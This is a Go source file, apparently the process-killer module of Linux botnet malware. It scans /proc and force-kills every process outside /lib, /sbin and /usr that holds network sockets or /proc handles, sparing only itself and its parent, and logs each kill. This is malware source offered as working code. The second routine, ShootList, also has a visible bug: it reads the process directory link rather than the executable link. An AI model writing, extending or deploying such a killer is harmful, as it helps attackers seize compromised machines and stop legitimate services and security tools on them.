package main
import (
"fmt"
"io/ioutil"
"os"
"path/filepath"
"strconv"
"strings"
"syscall"
)
type Killer struct {
RealPath string
}
var killers []Killer
func CheckPaths(file, path string) bool {
if strings.HasPrefix(file, "/lib/") ||
strings.HasPrefix(file, "/sbin/") ||
strings.HasPrefix(file, "/usr/") ||
file == path {
return true
}
return false
}
func FindRealPath(file string) bool {
for _, k := range killers {
if strings.Contains(k.RealPath, file) {
return true
}
}
return false
}
func AddProcess(file string) {
killers = append(killers, Killer{RealPath: file})
}
func KillProcess(pid int) error {
return syscall.Kill(pid, syscall.SIGKILL)
}
func ShootList(realPath string) {
pids, err := ioutil.ReadDir("/proc")
if err != nil {
return
}
for _, pidEntry := range pids {
pid, err := strconv.Atoi(pidEntry.Name())
if err != nil || pid == os.Getpid() || pid == os.Getppid() {
continue
}
exePath, err := os.Readlink(filepath.Join("/proc", pidEntry.Name()))
if err != nil {
continue
}
if CheckPaths(exePath, realPath) {
continue
}
fdDir := filepath.Join("/proc", pidEntry.Name(), "fd")
fdEntries, err := ioutil.ReadDir(fdDir)
if err != nil {
continue
}
for _, fdEntry := range fdEntries {
fdPath, err := os.Readlink(filepath.Join(fdDir, fdEntry.Name()))
if err != nil {
continue
}
if strings.Contains(fdPath, "socket:") || strings.Contains(fdPath, "/proc") {
if err := KillProcess(pid); err == nil {
fmt.Printf("[Killer] Found and killed process %d - Path: %s\n", pid, exePath)
if !FindRealPath(exePath) {
AddProcess(exePath)
}
break
}
}
}
}
}
func Start(realPath string) {
procDir := "/proc"
pids, err := ioutil.ReadDir(procDir)
if err != nil {
return
}
for _, pidEntry := range pids {
pid, err := strconv.Atoi(pidEntry.Name())
if err != nil || pid == os.Getpid() || pid == os.Getppid() {
continue
}
exePath, err := os.Readlink(filepath.Join(procDir, pidEntry.Name(), "exe"))
if err != nil {
continue
}
if CheckPaths(exePath, realPath) {
continue
}
fdDir := filepath.Join(procDir, pidEntry.Name(), "fd")
fdEntries, err := ioutil.ReadDir(fdDir)
if err != nil {
continue
}
for _, fdEntry := range fdEntries {
fdPath, err := os.Readlink(filepath.Join(fdDir, fdEntry.Name()))
if err != nil {
continue
}
if strings.Contains(fdPath, "socket:") || strings.Contains(fdPath, "/proc") {
if err := KillProcess(pid); err == nil {
fmt.Printf("[Killer] Found and killed process %d - Path: %s\n", pid, exePath)
AddProcess(exePath)
break
}
}
}
}
ShootList(realPath)
}
func StartKiller() {
executablePath, err := os.Executable()
if err != nil {
return
}
realPath, err := filepath.Abs(executablePath)
if err != nil {
return
}
Start(realPath)
}